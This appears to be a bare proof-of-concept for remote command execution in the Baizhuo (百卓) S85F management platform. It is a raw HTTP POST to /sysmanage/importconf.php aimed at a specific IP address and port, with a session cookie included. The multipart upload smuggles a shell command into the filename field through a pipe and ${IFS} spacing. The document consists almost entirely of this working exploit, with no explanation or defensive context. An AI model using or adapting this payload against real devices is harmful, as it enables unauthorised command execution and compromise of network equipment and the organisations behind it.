百卓智能S85F管理平台RCE-POC

POCPOST /sysmanage/importconf.php? HTTP/1.1Host: 60.29.117.204:8443Cookie: PHPSESSID=544810a771eeee640ffa3e710c427442User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------14818255536145421673683608122Content-Length: 389Origin: https://60.29.117.204:8443Referer: https://60.29.117.204:8443/sysmanage/importconf.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close
-----------------------------14818255536145421673683608122Content-Disposition: form-data; name="btn_file_renew"; filename="|echo${IFS}2224444>abc||.zip.tar.gz"Content-Type: application/octet-stream
sss-----------------------------14818255536145421673683608122Content-Disposition: form-data; name="rad"
radhttp_renew-----------------------------14818255536145421673683608122